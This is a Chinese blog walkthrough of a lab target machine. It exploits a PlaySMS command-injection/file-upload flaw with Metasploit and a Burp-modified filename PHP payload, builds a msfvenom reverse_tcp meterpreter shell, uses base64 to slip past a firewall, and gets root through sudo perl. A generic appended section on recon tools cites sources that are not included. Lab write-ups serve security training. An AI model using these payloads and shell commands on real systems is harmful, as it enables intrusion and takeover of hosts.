web靶机系列-命令注入

主机:192.168.136.133
靶机:192.168.136.139
用nmap、nikto扫描操作
在这里插入图片描述
发现在robots.txt下存在五个文件
在这里插入图片描述
在nothing的页面源代码下发现有五个密码
在这里插入图片描述
在这里插入图片描述
在刚刚的nikto的扫描中存在一个/secure/文件,打开发现一个压缩包
在这里插入图片描述
压缩包需要密码,经测试密码是freedom,但解压后的文件是txt文件。需要更改文件后缀,得到
在这里插入图片描述
登陆给出的网址,输入账户。密码再测试一下,发现是diana
在这里插入图片描述
在这里插入图片描述
用searchsploit查找页面架构下了漏洞
在这里插入图片描述
第一个可利用漏洞是’/sendfromfile.php’ Remote Code Execution / Unrestricted File Upload
在这里插入图片描述
利用上传文件名漏洞执行命令。
第二个漏洞是’import.php’ Remote Code Execution
在这里插入图片描述
利用有效载荷存储在backdoor.csv中,它执行我们的有效负载,并相应地显示在下一页的字段中。可以一句话注入提权。
根据网页我们利用’/sendfromfile.php’ Remote Code Execution / Unrestricted File Upload

1、利用msfconsole中use exploit/multi/http/playsms_filename_exec
在这里插入图片描述
配置好各参数
在这里插入图片描述
成功拿到靶机的shell
在这里插入图片描述
查看当前目录和当前账号是否具有root权限
在这里插入图片描述
开始提权
使用shell命令直接切换到靶机的shell,使用sudo -l查看当前用户可以使用sudo命令,发现存在一个perl命令,perl是一个调用脚本的命令,使用sudo perl -e "exec ‘/bin/bash’"直接使用root权限调用shell
在这里插入图片描述
使用python -c "import pty;pty.spawn(’/bin/bash’)"进行优化命令行界面。在/root下找到flag
在这里插入图片描述

2、在cat下查看漏洞目录,即cat /usr/share/exploitdb/exploits/php/webapps/42003.txt
在参考的文档中发现,通过修改上传文件的filename来获取系统信息,这里可以使用burpsuite截断修改
在这里插入图片描述
在上传页面上发现,这个页面只能上传.csv文件,在当前目录下touch 1.csv创建一个.csv用来上传,上传时记得开启burp的截断
在这里插入图片描述
将截获到的信息发送到repeater模块,找到filename修改成文档中看到的<?php system('uname -a'); dia();?>.php,确实发现返回了靶机的内核信息,漏洞可以利用。每执行过一次就需要重新截断请求重新提交。接下去就是获取到靶机的shell
在这里插入图片描述
首先使用msfvenom生成脚本msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.136.133 lport=4444 -f elf > /var/www/html/s,
然后启动Apache service apache2 start
在这里插入图片描述
接下去就是需要利用漏洞下载脚本并执行,攻击机上提前开启msf的handler模块进行监听。由于靶机上开启了防火墙,这时候就需要使用base64编码进行绕过。先在攻击机上需要执行的三条命令做base64编码。
在这里插入图片描述
启动msfconsole监听
在这里插入图片描述
在这里插入图片描述
接下来将在burpsuite上对 filename="<?php system(base64_decode('XXXXXXXX')); dia();?>.php".xxx的内容使用编码过的命令代替(重复三次)。当第三条命令执行完会没有任何反应,这时候就可以去msf上查看已经获取到shell

### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来获得系统的进一步访问权限。 #### 初始侦察阶段 在开始任何实际攻击之前,进行全面的情报搜集至关重要。这通常涉及到使用诸如`Nmap`这样的工具来进行端口扫描和服务版本检测: ```bash nmap -A <target_IP> ``` 上述命令能够揭示开放的服务及其潜在的安全配置缺陷[^3]。 #### Web服务器枚举 一旦确认目标运行着HTTP(S)服务,则应立即启动目录遍历尝试。可借助像`Dirb`或更现代的选择如`Gobuster`等工具完成这项工作: ```bash gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` 此过程有助于发现隐藏页面和管理接口,它们可能是后续入侵的关键入口点。 #### 应用层挖掘 对于基于PHP构建的应用程序来说,源码泄露是一个常见问题。如果运气好,在上一步找到的路径里可能会存在`.php~`或其他临时文件形式暴露出来的代码片段。仔细审查这部分内容往往能带来意想不到的收获——比如硬编码凭证或是调试模式下的敏感信息泄漏。 #### 数据库交互测试 许多老旧CMS(内容管理系统)容易受到SQL注入的影响。当遇到带有查询参数的URL时,不妨试试经典的单引号闭合技巧;而对于表单提交,则可通过修改POST数据包中的字段名与值组合来进行试探性输入验证绕过[^8]。 #### 提升权限方法 成功突破前端防护之后,下一步便是考虑怎样扩大战果直至取得root shell。Linux系统下,检查SUID位设置不当的二进制文件是一项基本技能;而Windows环境中则需留意计划任务、注册表键值异常变动等情况。 #### Drupal特定注意事项 鉴于部分描述提及到Drupal CMS, 若确实如此的话,值得注意的是有关于此框架内核升级机制的一个已知特性:即管理员账户密码可以通过编辑数据库记录的方式实现重置而不依赖原有认证流程[^9]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值